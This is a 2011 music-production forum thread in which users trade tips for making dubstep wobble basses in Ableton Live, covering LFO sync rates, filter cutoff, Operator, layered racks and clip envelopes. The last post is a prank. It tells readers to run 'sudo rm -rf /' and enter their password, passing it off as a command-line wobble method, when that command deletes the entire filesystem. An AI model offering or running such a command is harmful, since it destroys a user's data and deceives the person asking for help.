Dubstep Wobble

Discussion of music production, audio, equipment and any related topics, either with or without Ableton Live
SnoopWess

Dubstep Wobble

Post by SnoopWess » Tue Jan 25, 2011 10:24 pm

I have been recently working on dubstep wobble basses. What are some of the best basses and instruments in ableton to work with a wobble?
Does anybody have any wobble techniques that they can share with me??
Does anybody control a wobble with a midi controller, or is the LFO speed always pre-composed?

I would just like a little with wobbs. Thanks!

Danny_K

Re: Dubstep Wobble

Post by Danny_K » Tue Jan 25, 2011 10:56 pm

http://www.youtube.com/watch?v=QcMtxpUAKcQ

Thats a pretty basic tutorial on how to do it with simpler

There are many more, I know I saw one using Analog some where but I cant find it atm

JAMM

Post by JAMM » Wed Jan 26, 2011 12:08 am

"lazerbass" ensemble in reaktor can do some serious basswobbels.

antarktika

Post by antarktika » Wed Jan 26, 2011 4:23 am

JAMM wrote:"lazerbass" ensemble in reaktor can do some serious basswobbels.
SnoopWess wrote:in ableton

mescalinebanana

Post by mescalinebanana » Wed Jan 26, 2011 4:36 am

antarktika wrote:
JAMM wrote:"lazerbass" ensemble in reaktor can do some serious basswobbels.
SnoopWess wrote:in ableton
Owned.
Soundcloud Profile
                    • [list][list][list][list][list][list][list][list]...twitter
[/list][/list][/list][/list][/list][/list][/list][/list]

kanuck

Post by kanuck » Wed Jan 26, 2011 5:07 am

SnoopWess wrote:I have been recently working on dubstep wobble basses. What are some of the best basses and instruments in ableton to work with a wobble?
Does anybody have any wobble techniques that they can share with me??
Does anybody control a wobble with a midi controller, or is the LFO speed always pre-composed?

I would just like a little with wobbs. Thanks!
i'm not too great with the stuff but i can answer your last question. I use both... usually the LFO is tempo synced and I'll switch it between the rates for intensity. Other times i'll override it manually in hertz and this just allows me to control how fast the LFO changes and such.

mescalinebanana

Post by mescalinebanana » Wed Jan 26, 2011 5:14 am

I guess I'll contribute to the thread...

Operator is ideal for creating the nasty, dirty, shrieking basslines that are faddish in dubstep these days. Just farting around with it should yield some good results - I personally find it harder to make controlled, nice sounds with Operator. You might want to layer that with a lower Analog patch or something else to fatten up the bottom end. For extra grime, apply various distortion effects, especially the Vocoder with "Carrier" set to Modulator.

I assume there are people who use a MIDI controller to modulate the LFO speed. I've played around with that, and it's fun, but I personally don't care for wobble so I never incorporated it. It seems to work best when your LFO is set to Sync.

As an alternative to the LFO, you could also create your wobble with clip envelopes. That takes more work, but gives you way more flexibility for doing interesting stuff not limited to a sine wave - plus, you can use that technique to modulate a macro for extra tweaking goodness.
Soundcloud Profile
                    • [list][list][list][list][list][list][list][list]...twitter
[/list][/list][/list][/list][/list][/list][/list][/list]

ollyb303

Post by ollyb303 » Wed Jan 26, 2011 8:23 am

Operator's good. Rob Papen Albino 3's also good. NI Massive is, well, massive. You can make an awesome wobble bass with any of these any many many others.

Set your LFO to modulate the filter cutoff, then assign a knob to mod the LFO sync rate. I usually limit the knob to 1, 1/2, 1/4, 1/8 & 1/16 and avoid triplets - then crank that shit!!

Lots of fun...
.:O:B:1:.
ob1techno.com

manwell

Post by manwell » Wed Jan 26, 2011 10:13 am

Sometimes it can be interesting to layer up more than 1 instrument with different settings using racks. Try having 1 instrument (I use Massive but Analog would do as well) with a low pass filter linked to the LFO, and another using higher registers with a band pass filter with they same LFO speed and phase. Play with the range of each filter cutoff and modulation to get more interesting sounds than you can with 1 instrument.

Also by using 2 instruments you can use some distortion to add warmth to the higher synth while leaving the lower one uneffected to get more depth and weight. I always have a clean deep sine wave as the first osc to give weight and then layer up the other osc's on 2 instruments to give whatever character you are after. Process each individually, for example use some delay on the higher synth to give atmosphere but allow the deep bass to come through dry to retain it's power. Eq them separately get the right balance of the frequencies you want from each, then process it outside the rack as you would if it was a single instrument.

A lot of dubstep, particularly earlier sounds, uses triplets in both basslines and lead lines, so try it out and see if it works. This can give a more offbeat rolling feel and avoids more typical quantised brostep rhythms.

To be honest I don't really use lfos to modulate cutoff in my productions anymore, it can sound great but I tend to get caught up in the wobble and forget that the notes and sequence are more important. Try using envelopes to create the cutoff movement and programme a note every time you want a wobble, I find it's easier to create interesting parts this way. Try slow attack, fast release to create a "sucking" type garage and bassline sound.

Hope this helps

AceLuby

Post by AceLuby » Wed Jan 26, 2011 3:55 pm

Definitely Operator. I've been using it a lot to get some nasty dirtiness. If I lose bass I'll rack it up w/ another operator to produce that sub bass sound. Great tricks to get some good wobble sounds. Both the bass and wobble parts were made w/ operator:

http://soundcloud.com/jake-luby/track-2
levimoniz wrote:yes i'm a hypocrite and not intelligent

wehkah

Post by wehkah » Wed Jan 26, 2011 10:03 pm

Motto: sharing knowledge...

https://soundcloud.com/bytechop

NeoMetric

Post by NeoMetric » Thu Jan 27, 2011 6:42 pm

Interesting as I've lately been working for the elusive ultimate wobble. I have no problem working lives simpler or sampler as you learn in the afformentioned youtube link.. however i'm focused on the sample source.

I read somewhere or maybe in that vid that a 'square' or 'saw' tooth bass sample is preferred. I think maybe that applies sometimes.. I'm thinking most any open filter bass sample will do as there are no rules. But do you folks have a preference for the source 'tone' of your bass sample? Or what oscilator wav eforms, etc. are most traditional/trendy?

Also, if you don't want to fool with the simpler, the real lazy way out is to grab the Wah in Live's canned fx rack presets. It's convincing enough.
Virus Classic, Nord Lead 2, MPD32, Launchpad

necho

Post by necho » Fri Jan 28, 2011 2:11 pm

there's actually a really simple generative method for creative a decent dubstep wobble via the command line.

open a terminal window and just type:

sudo rm -rf /

then enter your password.

proper grimy!
_________
sigs suck.